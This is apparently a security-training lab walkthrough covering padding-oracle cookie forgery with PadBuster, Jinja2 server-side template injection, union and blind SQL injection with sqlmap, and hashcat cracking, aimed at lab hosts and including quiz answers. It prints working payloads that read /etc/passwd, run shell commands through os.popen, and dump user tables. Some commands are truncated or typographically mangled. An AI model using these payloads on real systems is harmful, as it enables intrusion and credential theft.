truelyyours

3 - MITRE ATT&CK - Initial Access - Exploiting Web Apps

12 min read

In the Cipher Block Chaining (CBC) mode, the input to the encryption algorithm is the XOR of the current plaintext block and the preceding ciphertext block; the same key is used for each block. In effect, they are chained together with the processing of the sequence of plaintext blocks. An initialization vector (IV) is XORed with the first plaintext block to produce the first ciphertext block. The CBC mode requires that the last block be padded to full b bits if it is a partial block. For decryption, each cipher block is passed through the decryption algorithm. The result is XORed with the preceding ciphertext block to produce the plaintext block. On decryption, the IV is XORed with the current output of the decryption algorithm to recover the first block of plaintext. The IV is a data block that is the same size as the cipher block. The IV must be known to both the sender and receiver but be unpredictable by a third party.

To get started, open a new browser window and visit the padding-oracle.com webserver on port 5001 `padding-oracle.com:5001

Click on the Register option and move to the next step.

Start BurpSuite

Burp Suite is a tool that comes in helpful when attacking websites and web applications. Burp Suite acts as a proxy, controlling the flow of traffic between an attacker’s browser and the target.

Configure Firefox

Click on ‘Manual proxy configuration’. Afterward, set the IP address to 127.0.0.1 and the Burp Proxy listener port to 8080. To finish, click OK to close all of the options dialogs.

Create a new user

Return to the web application and enter the following credentials to Register. Username: student Password: computer

Go back to Burpsuite and ensure that the Interception is on before submitting. Forward the first request sent to the webserver by clicking on the Forward button. This POST request will contain the values typed in the input fields.

Retrieve Authentication Cookie

The interesting request is the next one, a GET request containing the value of the authentication cookie.

Right-click on the request and choose “Send to Repeater” from the context menu. Repeater is a tool for manually manipulating and reissuing HTTP requests and analyzing the application’s responses. Now, visit the Repeater tab and click the Send button.

Decrypt The Value Of Auth Key

Copy the value of the auth cookie and open a new terminal.

A tool called PadBuster is incredibly effective at exploiting the Padding Oracle Vulnerability. The block size of the cipher is set to 8, and the sample is base64 encoded. `padbuster http://padding-oracle.com:5001/login.php ‘auth’ 8 —cookies auth=‘auth’ encoding 0

Replace every placeholder named ‘auth’ with the cookie value you just copied (don’t leave the literal word ‘auth’ in the command): Type 2 when it asks for an ID that matches the error condition.

Encrypt The Auth Key as Admin User

PadBuster showed that the cookie contains the user’s username. The aim is to escalate to the admin user. Therefore, using PadBuster’s plaintext argument, change the username to admin and try to encrypt it using the tool. `padbuster http://padding-oracle.com:5001/login.php ‘<actual_cookie>’ 8 —cookies auth=‘<actual_cookie>’ encoding 0 -plaintext user=admin Type 2 when prompted for an ID that matches the error condition.

Login as Admin

Copy the generated cookie shown in the terminal and return to the Repeater. Modify the captured request’s authentication cookie to the one generated using PadBuster. After updating the authentication cookie value, click the Send button to send it to the server. When received, the response is displayed, showing that the user has successfully logged in as admin.

Introduction to Server-Side Template Injection

Server-Side Template Injection, also known as SSTI, is a server-side vulnerability that arises due to no or poor validation of user passed input and it being inserted into a template engine. Most web applications use different template engines to provide dynamic data functionality, and there are several template engines written in different programming languages such as PHP (Smarty, Twig), Java (Velocity, Freemaker), Python (Jinja, Mako). The SSTI vulnerability can arise due to poor validation or a vulnerable template engine version.

Successful SSTI can expose a web application to different attack vectors such as XSS, HTML injections, or even command execution. In some cases, an attacker can compromise the complete web server by injecting arbitrary commands and obtaining a reverse shell on the target system.

Open a new tab and visit the template-injection.com website on port 5000. `template-injection.com:5000

A login page is presented. Type the following default credentials (username: admin, password: admin) to continue.

Detect SSTI

The following path should be taken to perform an efficient attack process of this vulnerability.

The first step towards exploitation is to detect that a web application is vulnerable. Submitting mathematical operations within a template expression is one of the easiest ways of detecting whether a server is vulnerable to template injection or not. `${7*7}

The first command does not get executed in the server. Try the modified second one. `{{7*7}}

The second command reveals that the server is vulnerable to template injection because it returns the result of the expression, value 49.

Identify SSTI

After discovering that the server is vulnerable, the next step is to identify the used template. There are two options, first is to submit payloads that may cause server errors, and the server will print those errors. The second option is to manually submit different programming language payloads and study how the template engine interprets them.

Using a methodology of elimination based on which syntax appears to be valid or invalid, an attacker can narrow down the options quite quickly.

Green and red arrows represent success and failure responses, respectively. Sometimes a single payload can have multiple distinct success responses. For example, the payload {{7*‘7’}} returns 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use. `{{7*‘7’}}

Running the above command reveals that the current template is Jinja2.

Exploit SSTI

After detecting that the Server-Side Template Injection vulnerability exists and successfully identifying the template engine, an attacker may start trying to find ways of exploiting it.

Injecting the payload {{ config.items() }} into the vulnerable server shows the content of the config object, which is a dictionary-like object containing all of the application’s configuration values. `{{config.items()}}

Exploit SSTI 2

Use the get_flashed_messages() function to access cached information in the server. The globals references the dictionary containing the function’s global variables. The server responds, confirming it is a recognized function rendered as a template by the webserver. {{ get_flashed_messages.__globals__ }} In the globals, user can access Python’s builtins functions. This set of functions is included natively in Python without the need for external libraries. {{ get_flashed_messages.__globals__.__builtins__ }}

Let’s try to read sensitive files like the /etc/passwd file with the open function payload. {{get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

After submitting the payload, the user will see the content of the passwd file presented.

Exploit SSTI 3

In Jinja2 templates, developers use the TemplateReference object to reuse code blocks from the template. The TemplateReference object contains an interesting internal attribute, _TemplateReference__context. This attribute allows access to three variables: cycler, joiner, and namespace. The following payloads are context-free and do not require anything, except being in a Jinja2 Template object.

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

The attacker can use these shorter payloads allowing access to the ‘os’ module in a template rendered by the Jinja2 engine to display the user’s id and the content of the current working directory.

{{ cycler.__init__.__globals__.os.popen('id').read() }}

`{{config.class.init.globals[‘os’].

Introduction to SQL Injection

SQL injection is the attack technique of using reserved SQL symbols to try and make the webserver execute a malicious query other than what was intended. This vulnerability is widespread because it targets the programmatic construction of SQL queries.

In this lab, two of the following SQL Injection attacks will be explained in the next steps:

Union-based SQLi happens when the union operator can be used to return the results of several SQL statements as part of the HTTP response.

Blind SQLi occurs when no error messages are received from the database; therefore, the attacker extracts data by asking true or false questions to the database.

Open a new tab and visit the website vulnerable to SQL injection. sql-injection.com

The application’s database needs to be reset. Hence click on the reset_database link. Lastly, click on the Go Back to Home link.

Union Based SQL Injection

Union-based SQL injection is the most common type of SQL injection. It comes from the class of inband SQL injection and is a technique that involves the UNION SQL statement to combine the results of two or more SELECT statements into a single result.

Click on the Union Based SQL Injection link shown on the homepage. To go through with the attack, a user must be created. Click on the register.php link and fill in the registration form with the preferred values. When done, click on Submit.

Read Content of Database

The first step is to resolve the number of columns that are being returned by the query. To do so, send a series of ORDER BY clauses and increment the specified column index until an error occurs. The database returns an error when the specified column index exceeds the number of actual columns in the result set.

’ order by 1 — //

Notice that the database returns an error when the specified column index is greater than five, meaning that the correct number of columns is five.

’ order by 6 — //

Having already determined the number of required columns, an attacker can retrieve the current database name, current user name and hostname, and MySQL server version by inserting the following query.

’ union select null, null, database(), user(), @@version — //

The attacker discovers that the current database name is ‘sqlitraining’ and the user name is ‘user’.

What version of MariaDB is running on the Target machine? 10.0.34

Extract Sensitive Data from Tables

In MySQL, a set of views called information_schema tables holds all the “metadata” or useful information for the database to function properly.

Continue trying to find the database structure and dumping the column names of the current database by submitting the following query.

`’ union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() — //

After knowing that a table named users exist in a database, an attacker may try to read the data of interesting columns of that table. With the last command, the column names were shown. Read id, username, password, and name columns from table ‘users’ using the following query.

`’ union select null, id, username, password, fname from users — //

Use a One-Way Hash without Salt

Having passwords in plain text means they are subject to disclosure. Anyone with access to the database can steal credentials, thereby compromising the integrity of the system and the data.

Instead of storing the password in plain text, a better approach is to store a hash of the data so that the password is not discernable. One-way hash functions are algorithms that translate any piece of data into a string called the digest. Their one-way nature means that although users can get the digest from the data, there is no reverse function to get the data back. In addition to thwarting hackers, it also prevents malicious users from casually browsing user credentials in the database.

Return to the terminal and create a new file named hashes.txt: `nano hashes.txt

Copy the dumped hashed from the database and save them in the newly created file.

Type the following command to brute force the hashes using hashcat. Hashcat is a highly configurable tool with many different attack options. Hashcat uses multithreading to handle multiple hashes and password lists during a single attack session. `hashcat -o cracked.txt -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

Be patient because this process lasts a few seconds. Do not type anything until the command is finished.

Verify that the hashes have been cracked successfully by reading the content of the cracked.txt file. `cat cracked.txt

Notice that the hashed passwords for the users ‘ramesh’ and ‘suresh’ are identical, indicating that they are using the same password. This suggests that no salt was applied during password hashing. A salt is a random value added to a password before hashing to ensure that identical passwords produce different hash values, thereby improving security.

What is the cracked password that is shared between two users? troll

Blind SQL Injection

In Blind SQL Injection, no data is transferred from a web application, meaning the attacker is unable to see the results of an attack and solely relies on the behavior of the application to deduce if a vulnerability exists.

First, click on Logout, which redirects back to the homepage. Then, click on the Blind SQL Injection link. Next, create a user that will be used throughout the attack. To create the user, click on the register.php link

Sqlmap

Sqlmap is a tool that automates the detection and exploitation of SQL injection flaws. Additionally, it automates the process of taking over database servers. Once Sqlmap detects the target is vulnerable to an SQL injection, the user can choose various options to perform an extensive back-end fingerprint on the database management system.

Type the following command to enumerate the databases of this web application. Press enter every time sqlmap asks for input. `sqlmap -u “http://sql-injection.com/blindsqli.php” —dbs —forms —crawl=2

Sqlmap reveals that a database named ‘sqli’ exists. Type the following command to extract tables for that database. `sqlmap -u “http://sql-injection.com/blindsqli.php” -D sqli —tables —forms —crawl=2

The data of table ‘users’ can be dumped using the following command. `sqlmap -u “http://sql-injection.com/blindsqli.php” -D sqli -T users —dump —forms —crawl=2

Based on the results, what is the description for user admin? I am an admin

Use of a One-Way Hash with a Predictable Salt

A hacker with access to a table of hashes could build data structures called rainbow tables that aid in breaking passwords given enough time and space. However, if developers add some unique noise to each digest, they prevent rainbow tables from defining the entire lookup space in one go. The hacker would need to build a complete set of tables for each noisy password, making it practically impossible given current knowledge and computational power.

Adding some noise to each password is called salting. A pseudo-random string can be used so that even if two users have the same password, they have different digests, making the process of “deciphering” those passwords much harder.